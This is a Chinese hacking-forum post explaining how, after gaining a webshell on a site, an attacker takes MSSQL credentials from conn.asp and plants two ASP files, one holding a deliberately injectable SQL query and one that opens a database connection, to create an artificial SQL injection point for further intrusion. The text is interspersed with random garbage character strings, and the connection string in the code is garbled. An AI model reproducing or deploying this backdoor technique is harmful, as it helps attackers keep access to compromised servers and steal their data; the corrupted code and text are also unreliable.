自己构造注入点方便入侵

admin

自己构造注入点方便入侵
: Z; C. k, M1 ]6 U5 Z
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点，然后方便渗透，找到更多的可利用的信息

( U& T7 e, b* }这两天一直考试，想了下，就先仍出来，有什么问题可以提出来，我们一起讨论！

首先你要拿了一个webshell，这样你找到连接数据库的文件，大多都是conn.asp这个文件里面有mssql的用户和
/ [0 z% D8 J' ~* V+ {1 c2 {* d% p9 X
密码，你要找到用户名、密码、数据库所在的IP，然后连接上去，至于连接大家应该都会，找到网站管理员的表
) H! Y! ~% k/ Z; y- l
2 U  l) L6 T  \- z4 \1 {, P; [因为我测试的时候是用管理员的表，我朋友说任何表名都可以，只要这个表存在，代码如下：
2 c- L8 D8 q2 g( D' P2 [
程序代码
<!--#include file="xx.asp"-->
<%
( l; r( R8 p4 j( K1 C' kset rs=server.createobject("ADODB.recordset")
id = request("id")
4 f) m  F" v$ O! ~strSQL = "select * from admin where id=" & id
3 j1 G( g5 y, D( h+ rrs.open strSQL,conn,1,3
& N# b& ?" u2 `2 ~rs.close
%>

* Q% \5 |$ s, O+ S把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名，注意必须存在

你可以连接上去看下表名就是了！这里假设的是admin是表名！这个文件名随便保存！

然后就要构造一个连接数据库的文件了，代码如下：
* T1 V9 L+ U7 {' g2 P程序代码
<%        
0 c9 L5 O( S& TstrSQLServerName = "000.000.000.000"     '服务器名称或地址
strSQLDBUserName = "sqlname"         '数据库帐号
6 `  k$ W% j+ R& p7 N! [strSQLDBPassword = "sqlpass"         '数据库密码
strSQLDBName = "sqldataname"           '数据库名称
$ c# h- I( ?: S. YSet conn = Server.CreateObject("ADODB.Connection")
2 S- R0 n) {/ n( I5 U, zstrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
conn.open strCon
% L( H; ^* F% f; a%>

( n# v$ m( Y  h, e这里应该都会了，就不罗嗦了，不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话，

6 _% u: f$ `. ?6 k9 y/ O就这样，正常情况下，就OK了，伪造成功……

2 I4 d' f/ I8 H           如果有什么问题可以提出来大家一起探讨解决。